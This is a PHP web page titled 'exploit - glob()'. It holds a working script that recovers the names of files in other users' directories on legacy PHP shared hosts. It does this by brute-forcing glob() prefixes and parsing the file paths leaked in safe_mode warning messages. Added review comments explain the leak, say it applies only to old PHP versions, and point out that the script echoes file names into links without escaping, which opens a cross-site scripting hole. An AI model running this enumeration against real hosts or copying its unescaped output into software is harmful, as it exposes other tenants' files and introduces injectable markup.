<!DOCTYPE HTML public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
<title>exploit - glob()</title>
</head>
<body>
<?php
// Purpose: prints a clickable listing of the names inside a directory without
// ever using glob()'s return value. Every name is recovered from the warning
// text that glob() leaves in $php_errormsg when the call is refused.
//
// Defender's summary:
//  - The weakness is an information leak through an error message: the refused
//    path is quoted back in the warning, so a restriction meant to hide other
//    users' files confirms their names instead.
//  - The "owned by uid" wording matched below corresponds to PHP's safe_mode
//    ownership-restriction warning. NOTE(review): inferred from the message
//    text; the page itself does not name the setting.
//  - $php_errormsg is only populated when track_errors is enabled. safe_mode
//    was removed in PHP 5.4, eregi() in PHP 7.0 and $php_errormsg in PHP 8.0,
//    so this is relevant to legacy shared-hosting interpreters only.
//  - Tenant isolation should rest on OS-level users/permissions and
//    open_basedir rather than on safe_mode.
//
// Input handling: the directory comes straight from the request ($_GET['path']).
// realpath() canonicalises it; a false/empty result falls back to '/', and a
// trailing '/' is forced so that name prefixes can be appended directly.
$path = realpath($_GET['path']); if (!$path) $path = '/'; if (substr($path,-1,1)!='/') $path .= '/';
// Prints the directory being listed (without the trailing slash, except for the
// root) and defines $foo, the candidate alphabet: the empty string, a-z, A-Z,
// 0-9 and a set of punctuation characters.
// NOTE(review): $path is echoed without htmlspecialchars().
echo '<b>',$path=='/'?'/':substr($path,0,strlen($path)-1),"</b><br>\n"; $foo = array('','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9','+','-',' ',',','.','_',';','!','(',')','=','%','&','$','#','@','~');
// Pass 1: one glob() call per candidate character, pattern "<path><char>*".
// '@' hides the warning from the output; the text is read from $php_errormsg.
// The regex captures from the first '/' through "owned by uid"; dropping the
// last 13 characters (the length of " owned by uid") leaves the quoted path,
// and only the first character of its basename is kept in $bar.
// NOTE(review): neither $php_errormsg nor $regs is cleared between iterations,
// so a call that produces no new warning may reuse the previous match; $bar is
// also never initialised before the first append.
foreach ($foo as $y) { $param = $path.$y.'*';
@glob($param); eregi('(/.*owned by uid)', $php_errormsg, $regs); $bar[] = substr(basename(substr($regs[0],0,strlen($regs[0])-13)),0,1);
}
// Collapse the observed first characters to a distinct set.
$bar = array_unique($bar);
// Pass 2: for every observed first character ($i) combined with two further
// candidates ($j, $k, each possibly the empty string) build a prefix of up to
// three characters, repeat the glob()/warning parse, and keep the whole
// basename this time. The loop issues count($foo)^2 * count($bar) glob() calls
// per request.
// NOTE(review): same stale $php_errormsg/$regs caveat as in pass 1; $files is
// only created by the first append, so sort() below presumably warns if the
// loop body never runs -- confirm.
foreach ($foo as $k) { foreach ($foo as $j) { foreach ($bar as $i) { $char = $i.$j.$k;
$param = $path.$char.'*';
@glob($param); eregi('(/.*owned by uid)', $php_errormsg, $regs); $files[] = basename(substr($regs[0],0,strlen($regs[0])-13));
}
}
}
// Order the recovered names; duplicates are dropped at output time.
sort($files);
// Output: one link per distinct name, pointing at glob2.php with the joined
// path as the next 'path' value (glob2.php is presumably this script's own
// file name -- confirm).
// NOTE(review): $path and $dump are written into the href, the title attribute
// and the link text without htmlspecialchars() or urlencode(), so a file name
// containing quotes or angle brackets becomes raw markup in the page shown to
// whoever views the listing.
foreach (array_unique($files) as $dump) { echo '<a href="glob2.php?path=',$path,$dump,'" title="',$path,$dump,'">',$dump,"</a><br>\n";
}
?>
</body>
</html>